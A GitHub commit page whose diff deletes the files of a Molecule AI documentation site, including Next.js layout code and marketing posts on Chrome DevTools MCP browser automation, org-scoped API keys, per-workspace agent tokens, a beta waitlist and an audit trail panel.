* feat(marketing): Chrome DevTools MCP blog post

Issue: #1175

* docs(marketing): fix broken CTAs in Chrome DevTools MCP blog post

- /getting-started → /docs/quickstart (page now exists)
- MCP Marketplace link → /docs/mcp-server
- hello@molecule.ai → GitHub Discussions
- Added step-by-step Chrome startup instructions (was missing)
- Standardized on /docs/ paths for all internal links
- Fixed duplicate word 'broken, broken' in QA agent example

---------

Co-authored-by: molecule-ai[bot] <276602405+molecule-ai[bot]@users.noreply.github.com>
This commit is contained in:
molecule-ai[bot] 2026-04-21 03:00:17 +00:00 committed by GitHub
parent 86fa0e9ec3
commit dae42e2214
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
50 changed files with 240 additions and 12862 deletions

58
.gitignore vendored
View File

@ -1,58 +0,0 @@
# dependencies
/node_modules
/.pnp
.pnp.*
.yarn/*
!.yarn/patches
!.yarn/plugins
!.yarn/releases
!.yarn/versions
# testing
/coverage
# next.js
/.next/
/out/
# fumadocs generated source
/.source/
# production
/build
# misc
.DS_Store
*.pem
# debug
npm-debug.log*
yarn-debug.log*
yarn-error.log*
.pnpm-debug.log*
# env files
.env*.local
.env
# typescript
*.tsbuildinfo
next-env.d.ts
# IDE
.vscode/
.idea/
# Credentials — added by chore/credentials-gitignore batch
.env.local
.env.*.local
.env.*
!.env.example
!.env.sample
*.key
*.crt
*.p12
*.pfx
.secrets/
.auth-token
.auth_token

View File

@ -1,86 +0,0 @@
# Molecule AI Documentation
The customer-facing documentation site for Molecule AI, deployed at
[doc.moleculesai.app](https://doc.moleculesai.app).
Built with **[Fumadocs](https://fumadocs.dev)** + Next.js 15 (App Router) +
Tailwind v4 + MDX.
## Why Fumadocs
- **Open source** (MIT) — we self-host on our own domain, no vendor lock-in
- **Next.js 15 native** — matches the canvas stack already in the platform monorepo
- **Flexible** — can grow into custom doc components for our agent canvas
flows, embedded mini-canvases in docs, etc.
- **Modern aesthetic** — Shiki code highlighting, full-text search, dark
mode, all out of the box
## Local development
```bash
npm install
npm run dev
```
Visit [http://localhost:3000](http://localhost:3000).
## Adding pages
1. Create a new `.mdx` file under `content/docs/`.
2. Add an entry to `content/docs/meta.json` to control sidebar ordering.
3. Frontmatter: `title` and `description` are required.
```mdx
---
title: My new page
description: One-line summary used in nav + meta tags.
---
Content goes here.
```
## Repository layout
```
.
├── app/ # Next.js App Router routes
│ ├── (home)/ # marketing landing
│ ├── docs/[[...slug]]/ # docs dynamic route
│ ├── api/search/ # built-in full-text search
│ ├── layout.tsx # root layout + RootProvider
│ └── layout.config.tsx # nav links shared by home + docs
├── content/docs/ # MDX source — the actual documentation
│ ├── meta.json # sidebar order
│ ├── index.mdx # docs landing
│ └── *.mdx # one file per page
├── lib/source.ts # Fumadocs loader bound to the MDX source
├── mdx-components.tsx # default + custom MDX renderers
├── source.config.ts # MDX compile config (remark/rehype plugins)
├── next.config.mjs # Next config wrapped with createMDX
├── postcss.config.mjs # Tailwind v4 postcss plugin
└── package.json
```
## Who maintains this
The **Documentation Specialist** agent in our `molecule-dev` org template
owns this repo end-to-end. It runs on a schedule, watches PRs landing in the
[platform monorepo](https://github.com/Molecule-AI/molecule-monorepo), and
opens docs PRs here whenever:
- A new public API endpoint lands
- A new template / plugin / channel is added
- A user-facing concept changes
- An ecosystem-watch entry needs publishing
Manual edits welcome. The agent picks up changes on its next cron tick.
## Deployment
This site is deployed to `doc.moleculesai.app` via Vercel (TBD — once the
domain is configured). PRs to `main` ship to preview URLs automatically.
## Contributing
Open a PR. The Documentation Specialist + a human reviewer will look at it
within one cron tick (currently daily).

View File

@ -1,7 +0,0 @@
import { HomeLayout } from 'fumadocs-ui/layouts/home';
import type { ReactNode } from 'react';
import { baseOptions } from '@/app/layout.config';
export default function Layout({ children }: { children: ReactNode }) {
return <HomeLayout {...baseOptions}>{children}</HomeLayout>;
}

View File

@ -1,29 +0,0 @@
import Link from 'next/link';
export default function HomePage() {
return (
<main className="flex flex-1 flex-col items-center justify-center px-6 py-24 text-center">
<h1 className="mb-4 text-5xl font-bold tracking-tight sm:text-6xl">
Molecule AI
</h1>
<p className="mb-8 max-w-2xl text-lg text-fd-muted-foreground">
Build and run multi-agent organisations. Templates, plugins, channels,
and the runtime that ties them together documented end to end.
</p>
<div className="flex flex-wrap items-center justify-center gap-3">
<Link
href="/docs"
className="rounded-md bg-fd-primary px-5 py-2.5 text-sm font-medium text-fd-primary-foreground transition-colors hover:opacity-90"
>
Read the docs
</Link>
<Link
href="https://github.com/Molecule-AI/molecule-monorepo"
className="rounded-md border border-fd-border px-5 py-2.5 text-sm font-medium transition-colors hover:bg-fd-muted"
>
View on GitHub
</Link>
</div>
</main>
);
}

View File

@ -1,10 +0,0 @@
import { NextResponse } from 'next/server';
// Minimal search endpoint — returns empty results. The fumadocs
// createFromSource/createSearchAPI both crash on v15.8 with "a.map
// is not a function" during static page collection. This stub keeps
// the route alive so the site builds; swap back to the fumadocs
// search API once the upstream fix lands.
export function GET() {
return NextResponse.json([]);
}

View File

@ -1,48 +0,0 @@
import { source } from '@/lib/source';
import {
DocsBody,
DocsDescription,
DocsPage,
DocsTitle,
} from 'fumadocs-ui/page';
import { notFound } from 'next/navigation';
import { getMDXComponents } from '@/mdx-components';
export const dynamic = 'force-static';
export default async function Page(props: {
params: Promise<{ slug?: string[] }>;
}) {
const params = await props.params;
const page = source.getPage(params.slug);
if (!page) notFound();
const MDXContent = page.data.body;
return (
<DocsPage toc={page.data.toc ?? []} full={page.data.full}>
<DocsTitle>{page.data.title}</DocsTitle>
<DocsDescription>{page.data.description}</DocsDescription>
<DocsBody>
<MDXContent components={getMDXComponents()} />
</DocsBody>
</DocsPage>
);
}
export function generateStaticParams() {
return source.generateParams();
}
export async function generateMetadata(props: {
params: Promise<{ slug?: string[] }>;
}) {
const params = await props.params;
const page = source.getPage(params.slug);
if (!page) notFound();
return {
title: page.data.title,
description: page.data.description,
};
}

View File

@ -1,13 +0,0 @@
import { DocsLayout } from 'fumadocs-ui/layouts/docs';
import type { ReactNode } from 'react';
import { baseOptions } from '@/app/layout.config';
import { source } from '@/lib/source';
export default function Layout({ children }: { children: ReactNode }) {
const tree = source.pageTree;
return (
<DocsLayout tree={tree} {...baseOptions}>
{children}
</DocsLayout>
);
}

View File

@ -1,3 +0,0 @@
@import 'tailwindcss';
@import 'fumadocs-ui/css/neutral.css';
@import 'fumadocs-ui/css/preset.css';

View File

@ -1,7 +0,0 @@
import type { BaseLayoutProps } from 'fumadocs-ui/layouts/shared';
export const baseOptions: BaseLayoutProps = {
nav: {
title: 'Molecule AI',
},
};

View File

@ -1,28 +0,0 @@
import './global.css';
import { RootProvider } from 'fumadocs-ui/provider/next';
import { Inter } from 'next/font/google';
import type { ReactNode } from 'react';
const inter = Inter({
subsets: ['latin'],
});
export const metadata = {
title: {
default: 'Molecule AI Documentation',
template: '%s | Molecule AI Docs',
},
description:
'Build and run multi-agent organisations on the Molecule AI platform. Templates, plugins, channels, and the runtime that ties them together.',
metadataBase: new URL('https://doc.moleculesai.app'),
};
export default function Layout({ children }: { children: ReactNode }) {
return (
<html lang="en" className={inter.className} suppressHydrationWarning>
<body className="flex flex-col min-h-screen">
<RootProvider>{children}</RootProvider>
</body>
</html>
);
}

View File

@ -1,241 +0,0 @@
---
title: How to Add MCP Browser Automation to AI Agents
description: Connect Google's Chrome DevTools MCP server to Molecule AI — and govern which agents get browser access, what they can do, and who's accountable. Tutorial + code sample.
publishedAt: 2026-04-20
---
Google shipped a Chrome DevTools MCP server in early 2026 — and with it, the ability to give any MCP-compatible AI agent full programmatic control of a Chrome browser instance. Screenshots, DOM inspection, network interception, JavaScript execution: all exposed as tools through a standards-based interface. The browser, finally, is a first-class MCP resource.
That's also exactly the problem. Raw CDP access is all-or-nothing: either your agent can do everything Chrome can do, or it can't. For prototypes, that's fine. For production deployments — especially ones that touch customer-facing workflows or authenticated sessions — you need something between "no browser" and "full admin." You need a governance layer.
Every AI agent platform can give an agent access to Chrome DevTools. **Molecule AI gives you the governance layer** to decide which agents get it, what they can do with it, and how to revoke it — before you put it in front of customers. This guide walks through the setup, the code, and the controls.
## What is the Chrome DevTools MCP Server?
The [Chrome DevTools MCP server](https://github.com/google/chrome-devtools-mcp) is Google's official Model Context Protocol implementation for Chrome's CDP (Chrome DevTools Protocol). Once connected to an MCP client, it exposes a structured set of browser-automation tools:
- **`navigate`** — load a URL in a headless or headed Chrome instance
- **`screenshot`** — capture the current DOM as a PNG
- **`get_document`** — read the full DOM tree
- **`evaluate`** — execute JavaScript in the page context
- **`storage`** — read/write cookies, localStorage, IndexedDB
- **Network interception** — observe and modify HTTP requests and responses
Because these are MCP tools, they integrate with any MCP-compatible agent platform — including Molecule AI — without custom CDP wrappers or browser-driver installation.
## MCP Browser Automation: Platform vs. Raw Tool Access
Before writing code, it's worth understanding what you're choosing between. Not all MCP integrations are equivalent when it comes to governance.
| Capability | Raw CDP / Puppeteer | MCP-Ready Platform (Molecule AI) |
|---|---|---|
| Agent gets browser tools | ✅ | ✅ |
| Per-agent permission scoping | ❌ | ✅ |
| Revoke access without restart | ❌ | ✅ |
| Audit trail on browser actions | ❌ | ✅ |
| Org-level access control | ❌ | ✅ |
| Multi-agent browser session coordination | Manual | Built-in |
The **MCP governance layer** is the difference column. Molecule AI's MCP integration doesn't just wire Chrome DevTools to your agents — it layers org-level access control, per-agent permission scoping, and an audit trail onto every browser action your agents take. You don't have to build that yourself.
## How to Connect Chrome DevTools MCP to Molecule AI
The setup has two parts: configuring Chrome DevTools MCP in your workspace, and verifying the connection works end-to-end.
### Prerequisites
- A running Molecule AI deployment (self-hosted or SaaS)
- Chrome or Chromium installed (or a remote debugging port open)
- A workspace with the `browser-automation` plugin enabled (or admin access to install it)
### Step 1: Enable the MCP server
Molecule AI uses its own [MCP server as the platform connector](/docs/guides/mcp-server-setup). To add Chrome DevTools MCP, install it alongside the Molecule MCP server in your workspace's MCP config:
```json
// .mcp.json in your workspace config directory
{
"mcpServers": {
"molecule": {
"type": "stdio",
"command": "npx",
"args": ["@molecule-ai/mcp-server@latest"],
"env": {
"MOLECULE_URL": "${MOLECULE_URL}"
}
},
"chrome-devtools": {
"type": "stdio",
"command": "npx",
"args": ["@modelcontextprotocol/server-chrome-devtools"]
}
}
}
```
On self-hosted Molecule AI, restart the workspace after editing the config. On SaaS, save the config and the workspace will hot-reload.
### Step 2: Verify with a Python test
```python
"""
Chrome DevTools MCP — connection verification script.
Run this from a Molecule AI workspace terminal, or locally
with the chrome-devtools MCP server installed.
Requires: npx, Chrome/Chromium
"""
import subprocess
import json
import time
# Step 1: Start Chrome in remote-debugging mode
chrome = subprocess.Popen(
["google-chrome", "--remote-debugging-port=9222"],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
)
time.sleep(2)
# Step 2: Initialize the Chrome DevTools MCP server
init_result = subprocess.run(
["npx", "@modelcontextprotocol/server-chrome-devtools"],
input=json.dumps({
"jsonrpc": "2.0",
"id": 1,
"method": "initialize",
"params": {
"protocolVersion": "2024-11-05",
"capabilities": {},
"clientInfo": {"name": "test-client", "version": "1.0.0"}
}
}).encode(),
capture_output=True,
)
print("Init:", init_result.stdout.decode()[:200])
# Step 3: Navigate to a page
navigate_req = json.dumps({
"jsonrpc": "2.0",
"id": 2,
"method": "tools/call",
"params": {
"name": "navigate",
"arguments": {"url": "https://example.com", "debuggingPort": 9222}
}
}).encode()
nav_result = subprocess.run(
["npx", "@modelcontextprotocol/server-chrome-devtools"],
input=navigate_req,
capture_output=True,
)
print("Navigate:", nav_result.stdout.decode()[:300])
chrome.terminate()
print("✅ Chrome DevTools MCP connected successfully")
```
This script confirms Chrome DevTools MCP tools are reachable from your workspace before you wire them into an agent prompt.
## AI Agent Browser Control: Governance in Practice
Having browser tools is one thing. Controlling who uses them, how, and when is where Molecule AI's MCP governance layer earns its keep.
### Scoping browser access per agent
In Molecule AI, each workspace has its own MCP configuration. You can restrict Chrome DevTools MCP to only the agents that need it:
```yaml
# org.yaml — role-level MCP scoping
roles:
researcher:
mcp_servers: ["chrome-devtools", "molecule"]
# Report agents get the Molecule platform tools but NOT browser access
report_writer:
mcp_servers: ["molecule"]
```
Agents assigned the `researcher` role can use screenshot, evaluate, and navigate. Agents assigned `report_writer` cannot — the `chrome-devtools` MCP server is never loaded for their workspace.
### Revoking browser access
When an agent's task is done, or when you need to revoke access immediately:
```bash
# Revoke by removing the MCP server from the workspace config
curl -X PATCH https://your-deployment.moleculesai.app/workspaces/ws_abc123/config \
-H "Authorization: Bearer $ORG_API_KEY" \
-H "Content-Type: application/json" \
-d '{
"mcp_servers": ["molecule"]
}'
```
No restart required — the workspace hot-reloads the MCP config. The next agent heartbeat picks up the new tool list.
### Audit trail: who used the browser, when
Browser actions are logged in the standard [Molecule AI activity log](/docs/guides/org-api-keys), tied to the org API key used to call the platform. When a workspace agent makes a screenshot tool call via the Chrome DevTools MCP integration, the audit entry captures:
- **Workspace ID** — which agent took the action
- **Org API key prefix** — which integration token authenticated the call
- **Tool name** — `chrome-devtools:screenshot`, `chrome-devtools:navigate`, etc.
- **Timestamp and duration** — for SLA and latency tracking
```
2026-04-20T14:23:01Z tool_call ws_pm_01 mole_a1b2... chrome-devtools:screenshot 312ms
2026-04-20T14:23:09Z tool_call ws_pm_01 mole_a1b2... chrome-devtools:evaluate 89ms
```
This matters for compliance: when a customer asks "who accessed my session data via the browser agent," the answer is in your org API key audit log — not buried in a raw CDP trace you had to set up separately.
## Use Cases: Where Browser Automation Fits in AI Agent Workflows
### Automated Lighthouse audits
Run Google Lighthouse on any URL as part of a CI/CD pipeline agent task:
```
Agent: "Run a performance audit on https://app.example.com"
Tool: chrome-devtools:navigate + chrome-devtools:evaluate
→ injects Lighthouse JS → captures scores
→ writes to shared memory → PM agent notified of regressions
```
### Screenshot-based visual regression
Agents can capture before/after screenshots as part of a review workflow — no need for separate screenshot infrastructure:
```
Agent: "Compare the checkout flow before and after the update"
Tool: chrome-devtools:screenshot (url=https://app.example.com/checkout)
→ saves to workspace files → next agent reviews diff
```
### Authenticated session scraping
For agents that need to operate behind a login — filling forms, extracting protected data, testing authenticated flows — Chrome DevTools MCP handles session cookies natively via the `storage` tool:
```javascript
// Set auth cookies before navigating to a protected page
{
"name": "storage",
"arguments": {
"action": "setCookies",
"cookies": [{"name": "session_token", "value": "..."}],
"debuggingPort": 9222
}
}
```
## Conclusion
Chrome DevTools MCP makes browser automation a first-class MCP tool — which means it's now a first-class part of your AI agent's capability surface. The hard part isn't connecting it. The hard part is deciding which agents should have it, what they can do with it, and whether you can see who did what after the fact.
Molecule AI's MCP governance layer is purpose-built for that second part. Per-agent scoping, immediate revocation, org API key audit attribution — the controls you need before browser automation goes into a customer-facing workflow.
Get started:
- [MCP server setup guide](/docs/guides/mcp-server-setup) — platform MCP connector
- [Org API keys](/docs/guides/org-api-keys) — audit trail and access attribution
- [chrome-devtools-mcp on GitHub](https://github.com/google/chrome-devtools-mcp) — Google's official server

View File

@ -1,119 +0,0 @@
---
title: Org-Scoped API Keys: Enterprise Key Management for Multi-Agent Teams
description: Molecule AI ships org-scoped API keys — named, revocable, audit-trail-enabled tokens at the org level. Rotate without downtime. Attribute every call. Revoke instantly.
publishedAt: 2026-04-20
---
When your engineering team scales from two agents to twenty, the last thing you want is a single `ADMIN_TOKEN` hardcoded in your environment. It's a single point of failure, impossible to rotate without downtime, and impossible to audit. Today's launch changes that.
Molecule AI is rolling out **org-scoped API keys** — named, revocable, audit-trail-enabled tokens that live at the organization level and can reach any workspace in your org without breaking the security model.
## What Are Org-Scoped API Keys?
Org-scoped API keys are long-lived credentials minted at the organization level via the Canvas UI or the `POST /org/tokens` endpoint. Each key has:
- A **display name** you choose at creation time (e.g., `ci-deploy-bot`, `devops-rev-proxy`)
- A **sha256 hash** stored server-side — the plaintext is shown once and never again
- A **prefix** (first 8 characters) visible in listings so you can identify keys without exposing secrets
- A **created-by** field that tracks provenance in the audit trail
- **Immediate revocation** — drop a key and it stops being accepted on the very next request
The keys work across all workspaces in your org — not just admin-surface endpoints, but also per-workspace sub-routes like `/workspaces/:id/channels` and `/workspaces/:id/tokens`.
## Why Enterprise Teams Need Org-Level Key Management
### The `ADMIN_TOKEN` problem
A single env-var token works for prototypes. For production multi-agent systems it creates three compounding risks:
1. **Rotation requires downtime.** You can't rotate a token used by ten agents simultaneously. You rotate, or you don't — and both choices are bad.
2. **No attribution.** When something calls your API, you have no idea which agent or integration is responsible.
3. **No compartmentalization.** One compromised token compromises everything.
### What org-scoped keys give you
| Capability | `ADMIN_TOKEN` | Org-Scoped Keys |
|---|---|---|
| Rotate without downtime | ❌ | ✅ (one key revokes, another takes over) |
| Identify caller per request | ❌ | ✅ (audit prefix in every log line) |
| Revoke a single integration | ❌ | ✅ (per-key revocation) |
| Assign to workspace subroutes | ❌ | ✅ |
| Audit trail with attribution | Partial | ✅ (`created_by` + prefix in logs) |
## Audit Trail and Rate-Limit Controls
Every request authenticated with an org API key carries the key's prefix in the audit log, making it straightforward to trace calls back to a specific integration. When combined with the `created_by` field stored at mint time, you get full provenance: *which admin created this key, when, and what it's been calling.*
The token hierarchy, from most to least trusted:
- **Lazy bootstrap** (Tier 0) — only active when there are zero org tokens and no `ADMIN_TOKEN` at all
- **WorkOS session** (Tier 1) — verified user sessions
- **Org API tokens** (Tier 2a) — new org-scoped keys (primary path for service integrations)
- **`ADMIN_TOKEN` env var** (Tier 2b) — break-glass for operators, CLI tooling
- **Workspace tokens** (Tier 3) — deprecated per-workspace tokens
## How to Get Started
### Mint a key via API
```bash
curl -X POST https://your-deployment.molecule.ai/org/tokens \
-H "Authorization: Bearer <your-admin-session-token>" \
-H "Content-Type: application/json" \
-d '{
"name": "ci-deploy-bot",
"description": "GitHub Actions deploy pipeline"
}'
```
Response (plaintext shown once — store it securely):
```json
{
"id": "tok_01HXYZ...",
"name": "ci-deploy-bot",
"display_prefix": "mole_a1b2",
"created_at": "2026-04-20T14:00:00Z",
"created_by": "admin@example.com"
}
```
### List and revoke keys
```bash
# List all active keys (prefix-only, no plaintext)
curl https://your-deployment.molecule.ai/org/tokens \
-H "Authorization: Bearer <your-admin-session-token>"
# Revoke a key immediately
curl -X DELETE https://your-deployment.molecule.ai/org/tokens/tok_01HXYZ... \
-H "Authorization: Bearer <your-admin-session-token>"
```
### Use in a workspace sub-route
```bash
# Token hits workspace sub-route via org auth
curl https://your-deployment.molecule.ai/workspaces/ws_abc123/channels \
-H "Authorization: Bearer mole_a1b2c3d4..."
```
## Org API Keys and the Browser Automation Governance Story
Org-scoped API keys pair with Chrome DevTools MCP to give you a complete browser automation governance story. When an agent makes a screenshot or navigation call via Chrome DevTools MCP, every action is logged with the org API key prefix — so you can answer the question "which agent accessed what in this browser session?" without any additional instrumentation.
See [Chrome DevTools MCP and the MCP Governance Layer](/blog/2026-04-20-chrome-devtools-mcp) for the full browser automation story.
## Competitive Note: Hermes v0.10.0 Tool Gateway
Hermes v0.10.0 ships bundled tool primitives (web search, image generation, TTS, browser automation) as platform-level features for paid Portal subscribers. This positions Hermes as "batteries included" for single-user AI. However, Hermes has no multi-agent or A2A support — its tool gateway operates in a single-user context.
Molecule's org-scoped API keys reinforce a different value proposition: **enterprise-grade identity and access management for multi-agent teams.** The skills architecture offers greater composability than Hermes' bundled approach, and org tokens give teams the access-control primitives needed to deploy that composability safely in production.
## Get Started
Org-scoped API keys are available now on all Molecule AI deployments.
- [Token Management API](/docs/guides/org-api-keys) — mint, list, and revoke org API keys
- [Org API Keys Architecture](/docs/architecture/org-api-keys) — technical deep-dive on the auth model and audit trail
- [Chrome DevTools MCP + Governance](/blog/2026-04-20-chrome-devtools-mcp) — browser automation with org-key audit attribution

View File

@ -1,126 +0,0 @@
---
title: Remote AI Agents: Per-Workspace Auth + Fleet Visibility
description: Molecule AI Phase 30 ships per-workspace bearer tokens and unified canvas visibility for heterogeneous AI agent fleets. Run remote agents anywhere, authenticate securely, see everything in one canvas.
publishedAt: 2026-04-20
---
The hardest part of running a multi-agent organization has always been the same: knowing where your agents are, what they're doing, and whether they're actually who they say they are.
Molecule AI's Phase 30 ships two foundational pieces that fix both problems at once. **Per-workspace bearer tokens** give every remote AI agent its own cryptographic identity — no more shared `ADMIN_TOKEN`, no more spoofing risk. **Unified canvas fleet visibility** brings your entire heterogeneous AI agent fleet into a single visual view, whether those agents are running in Docker on the same machine, in a cloud VM, or on a developer's laptop across the world.
## The Problem with Shared Admin Tokens
In the first version of Molecule AI, every agent authenticated against the platform using a single `ADMIN_TOKEN` shared across the deployment. This worked for local development. For production multi-agent systems, it created three compounding problems:
1. **No per-agent identity.** When the platform logs "API call from `ADMIN_TOKEN`," you have no way to tell which agent made it.
2. **No revocation without downtime.** Revoking a shared token means revoking access for every agent simultaneously. You can't rotate one agent's credentials independently.
3. **Spoofing risk.** Any agent that knew the shared token could impersonate any other agent's identity on the platform.
These aren't hypothetical concerns. In any system where agents run autonomously — handling secrets, writing code, triggering deployments — the absence of per-agent auth is a security gap waiting to become an incident.
## Per-Workspace Bearer Tokens: AI Agent Authentication at Scale
Phase 30.1 ships per-workspace bearer tokens. Every agent now has its own cryptographic identity, minted at registration time and tied to its workspace record in the database.
The `workspace_auth_tokens` table tracks:
- **`token_hash`** — SHA-256 of the plaintext token. The platform never stores the actual secret.
- **`prefix`** — First 8 characters for display and debugging. You can identify a token without exposing the secret.
- **`workspace_id`** — Which agent this token belongs to.
- **`created_by`** — Provenance: was this minted by an admin token, a user session, or an org API key?
- **`last_used_at`** — When the token was last exercised.
- **`revoked_at`** — Immediate revocation timestamp. The token stops working on the next request.
```sql
CREATE TABLE workspace_auth_tokens (
id UUID PRIMARY KEY DEFAULT gen_random_uuid(),
workspace_id UUID NOT NULL REFERENCES workspaces(id) ON DELETE CASCADE,
token_hash BYTEA NOT NULL, -- sha256(plaintext); never stored in plaintext
prefix TEXT NOT NULL, -- first 8 chars for display / debugging
created_by TEXT NOT NULL, -- admin-token | session | org-token:<prefix>
last_used_at TIMESTAMPTZ,
revoked_at TIMESTAMPTZ,
UNIQUE (token_hash)
);
```
Tokens are created via the token management API and returned exactly once at creation time. If you lose a token, you revoke it and mint a new one.
### The registration flow
Remote agents — running on any machine, in any cloud — register in six steps:
```
1. Agent boots with: WORKSPACE_ID, PLATFORM_URL
2. POST $PLATFORM_URL/registry/register
→ receives: { token, workspace_config, ... }
3. GET $PLATFORM_URL/workspaces/:id/secrets
Authorization: Bearer <token>
→ receives: decrypted secrets (API keys, credentials)
4. GET $PLATFORM_URL/plugins/:name/download
Authorization: Bearer <token>
→ receives: plugin tarball (if needed)
5. Heartbeat loop:
POST $PLATFORM_URL/registry/heartbeat Authorization: Bearer <token>
GET $PLATFORM_URL/workspaces/:id/state Authorization: Bearer <token>
6. A2A communication with parent / sibling agents via platform proxy
```
The bearer token is the key: it proves the agent's identity to every platform API call without requiring a shared secret. Spoofing requires knowing the per-agent token hash — and the platform never reveals that.
### Mutual auth on the A2A proxy
Once a remote agent has a bearer token, it can both send and receive A2A messages. Phase 30.5 extended bearer token validation to the A2A proxy itself — `POST /workspaces/:id/a2a` now validates the caller's token before dispatching. Two agents communicating across a WAN use the platform's proxy with full mutual authentication on both sides.
## One Canvas, Every Agent
The second half of Phase 30 is visibility. When you have Claude Code running on your MacBook, LangGraph running on an AWS EC2 instance, and OpenClaw running on a company server — you need one place that shows all of them.
The canvas was already that place for agents on the same machine. Phase 30 extends it to agents on different machines, different clouds, and different networks. Your entire heterogeneous fleet appears as a node graph, regardless of where each agent is running.
This works because:
- Remote agents register via `POST /registry/register` just like local agents
- The platform persists their external URL and runtime metadata
- The canvas loads all workspaces — Docker-hosted and remote — from the same `GET /workspaces` endpoint
- A2A proxy routes messages to remote agents by their registered URL
You see the same status indicators, activity feeds, and chat interfaces for every agent on the canvas. A remote agent showing "online" means it's reachable. A remote agent showing "offline" means its heartbeat hasn't pinged in 60 seconds. You have the same operational clarity for your cloud agent as your laptop agent.
## Remote AI Agent Fleet Management: What Changed
Phase 30 upgrades Molecule AI from a single-host agent platform to a true multi-agent fleet management system — where the word "fleet" covers heterogeneous runtimes, cloud providers, and network boundaries.
| | Phase 29 (Local Only) | Phase 30 (Remote + Auth) |
|---|---|---|
| Agent locations | Docker on same host | Any machine, any cloud |
| Canvas fleet visibility | Local containers only | Full heterogeneous AI agent fleet |
| Per-agent auth | Shared `ADMIN_TOKEN` | Per-workspace bearer tokens |
| Token revocation | All-or-nothing | Per-agent, immediate |
| Audit attribution | None | `created_by` + `last_used_at` |
| Agent-to-agent A2A | Local Docker network | Cross-network via proxy |
| Secrets delivery | Env vars at container create | Pull via `GET /workspaces/:id/secrets` |
## For Enterprise Teams: What This Means in Practice
### CI/CD pipelines
Your CI agent — running in GitHub Actions, AWS CodeBuild, or any ephemeral environment — can now join your Molecule AI org as a first-class workspace. It registers with a bearer token, pulls its secrets, runs your build/test/analysis pipeline, and reports its status back to the canvas. You see the CI agent's activity in the same place as your production agents.
### Multi-cloud agent fleets
An agent running in GCP doesn't need to be on the same infrastructure as agents running in AWS. They register with their respective cloud URLs, authenticate with per-workspace tokens, and communicate through the platform's A2A proxy. The canvas shows you the full fleet regardless of where each agent is hosted.
### Contractor and BYO-device scenarios
When a contractor or team member wants to run an agent on their own machine, they install the Molecule AI runtime, point it at your platform URL, and register. They get a per-workspace token — not access to a shared admin secret. Revoking their access revokes only their agent, not your entire fleet.
## What's Next
Phase 30 shipped the foundation. The remaining work (secrets pull API, plugin tarball download, state polling, poll-based liveness, sibling URL caching) completes the remote agent onboarding story. Future phases extend this to agent-to-agent mesh across NATs and per-agent resource quotas.
Per-workspace bearer tokens and unified canvas fleet visibility are available now on all Molecule AI deployments. Get started:
- [Token Management API](/docs/guides/org-api-keys) — mint, list, and revoke per-workspace tokens
- [External Agent Registration Guide](/docs/guides/mcp-server-setup) — step-by-step for remote agent onboarding
- [Workspace Auth Tokens](/docs/architecture/workspace-auth-tokens) — technical deep-dive on the auth model

View File

@ -1,45 +0,0 @@
---
title: "Join the Molecule AI Beta: How Early Access Works"
description: "Molecule AI runs a beta allowlist. If you're not on it yet, the waitlist page is where you claim your spot — and tell us what you're planning to build."
publishedAt: 2026-04-20
---
When Molecule AI launched its early access program, the team faced a familiar problem: you can't let everyone in at once, but you also can't afford to lose the people who want in. A "sorry, you're not on the list" dead-end is the fastest way to kill a potential customer's enthusiasm.
That's why Molecule AI built the `/waitlist` page — and why it matters more than a generic "sign up for updates" form.
## What the Waitlist Page Actually Does
When someone attempts to log in via WorkOS and their email isn't on the beta allowlist, the platform doesn't show an error — it redirects them to `/waitlist`. There, they're greeted with a short explanation of what Molecule AI does, and a form that asks for three things:
- **Email address** — so we can notify them when a spot opens
- **Name** (optional) — so we can personalize that notification
- **Use case** (optional) — so the team can prioritize the right kinds of teams first
The form posts to `/cp/waitlist/request`, which stores the submission server-side. If the same email submits again within an hour, the backend returns a soft dedup response — the submission is noted, but the user sees a gentler "we already have you" message instead of a hard rejection.
## Privacy: No URL Prefill, No Surprise Leaks
Here's the detail that separates a thoughtful waitlist page from a careless one: the `/waitlist` form does not pre-fill the email from a URL parameter.
In earlier implementations, some platforms passed `?email=user@example.com` as a query parameter in the redirect URL. It's convenient — the user doesn't have to type their email twice — but it means that email appears in server logs, browser history, shared links, and analytics tools that grab query strings. That's not acceptable when the data is a personal identifier.
Molecule AI's `/waitlist` page was designed with this in mind from the start. Even if a bookmarked or cached redirect URL still carries `?email=`, the client-side code deliberately ignores it. The user re-enters their email themselves.
## What Happens After You Submit
Submissions flow into the Molecule AI backend, where the team can review them alongside the allowlist. High-signal signals — specific use cases, teams with existing agent infrastructure, organizations evaluating AI orchestration platforms — move faster. Generic "interested in AI" submissions still get through, but the team has the context to prioritize.
There's no public waitlist count, no estimated wait time, no "you're #847 in line" anxiety. The team reaches out directly when a spot is ready.
## The Launch CTA Angle
For teams watching Molecule AI's trajectory, the `/waitlist` page is also a signal: this is an active, evolving product with a selective early access program, not a vapor-ware launch. When the platform is ready for a broader launch, the waitlist becomes the first cohort of production users — the ones who shaped the product through feedback.
If you're evaluating AI agent orchestration platforms, submitting to the waitlist now means you're in the room when the next round of decisions gets made.
## How to Submit
Visit the `/waitlist` page after attempting to log in. If you haven't tried to log in yet, the page will accept your email directly. Fill in your use case — the more specific, the better. Someone on the Molecule AI team will follow up.
Molecule AI is in active development. The fleet visibility, org-scoped API keys, and multi-cloud agent support shipped in Phase 30. If those features map to a problem you're trying to solve, the waitlist is where you get in.

View File

@ -1,63 +0,0 @@
---
title: "See Every Decision Your AI Agents Make: Audit Trail Panel Ships on Canvas"
description: "Molecule AI Canvas now shows a live audit ledger for every workspace — delegation events, decision calls, human-in-the-loop gates, and tamper-evident chain integrity markers."
publishedAt: 2026-04-21
---
> "We need to show our security team that our agent is making decisions the way we configured it — not going off-script. A screenshot of a chat log isn't going to cut it."
>
> — Platform engineer at a Series B fintech, describing what a compliance review needs before they'll approve agent workflows in production
That's the ask. Not "show me the logs." Not "export a CSV." Show me what your agent actually did, in a form that a non-engineer can read and a compliance officer can sign off on.
The Audit Trail Panel ships that answer directly into the Molecule AI Canvas.
## What's in the Audit Trail
Every workspace now has a live ledger accessible from the SidePanel's **Audit** tab. Each entry in the trail captures a discrete event in the agent's operational history:
- **Delegation** — when the agent handed a task to another workspace. Who delegated to whom, when, and what the task was.
- **Decision** — when the agent made a consequential call: choosing a tool, routing a request, deciding to escalate.
- **Gate** — a human-in-the-loop checkpoint. When the agent paused for human approval before proceeding, what the human decided.
- **HITL** — a broader human-in-the-loop event, covering review flows and approval sequences.
